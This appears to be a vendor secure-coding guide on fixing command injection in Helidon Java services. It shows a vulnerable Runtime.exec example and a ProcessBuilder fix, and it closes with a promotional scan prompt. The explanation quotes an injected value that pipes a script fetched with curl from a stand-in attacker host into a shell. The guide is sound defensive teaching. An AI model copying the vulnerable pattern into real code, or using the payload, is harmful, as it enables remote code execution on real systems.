GuardAPI Logo
GuardAPI

Fix Command Injection in Helidon

Command injection in Helidon SE/MP occurs when untrusted user input is concatenated directly into system command executors. If your microservice executes OS-level binaries using data from a ServerRequest without strict validation, you are handing attackers a Remote Code Execution (RCE) primitive. In a containerized Helidon environment, this leads to full pod compromise.

The Vulnerable Pattern

@RoutingPath("/lookup")
public void handle(ServerRequest req, ServerResponse res) {
    String host = req.query().get("host").orElse("localhost");
    // VULNERABLE: String concatenation allows shell metacharacters like ';', '|', or '&&'
    try {
        Process p = Runtime.getRuntime().exec("nslookup " + host);
        res.send("Lookup started for: " + host);
    } catch (IOException e) {
        res.status(500).send(e.getMessage());
    }
}

The Secure Implementation

The vulnerability exists because Runtime.exec(String) treats the entire string as a shell command, allowing an attacker to append malicious commands (e.g., 'google.com; curl http://attacker.com/sh | sh'). The fix is two-fold: First, use ProcessBuilder(String...) which passes arguments as a literal array to the OS execve call, bypassing shell parsing entirely. Second, implement a strict regex allow-list to ensure the input contains only expected characters, providing a defense-in-depth layer against unexpected binary behavior.

@RoutingPath("/lookup")
public void handle(ServerRequest req, ServerResponse res) {
    String host = req.query().get("host").orElse("localhost");

// 1. Strict Allow-list Validation
if (!host.matches("^[a-zA-Z0-9.-]+$")) {
    res.status(400).send("Invalid hostname format");
    return;
}

// 2. Use ProcessBuilder with an argument list (No shell interpolation)
try {
    ProcessBuilder pb = new ProcessBuilder("nslookup", host);
    pb.start();
    res.send("Secure lookup started.");
} catch (IOException e) {
    res.status(500).send("Execution failed");
}


}

System Alert • ID: 2683
Target: Helidon API
Potential Vulnerability

Your Helidon API might be exposed to Command Injection

74% of Helidon apps fail this check. Hackers use automated scanners to find this specific flaw. Check your codebase before they do.

RUN FREE SECURITY DIAGNOSTIC
GuardLabs Engine: ONLINE

Free Tier • No Credit Card • Instant Report

Verified by Ghost Labs Security Team

This content is continuously validated by our automated security engine and reviewed by our research team. Ghost Labs analyzes over 500+ vulnerability patterns across 40+ frameworks to provide up-to-date remediation strategies.

About GuardLabs → Follow us on X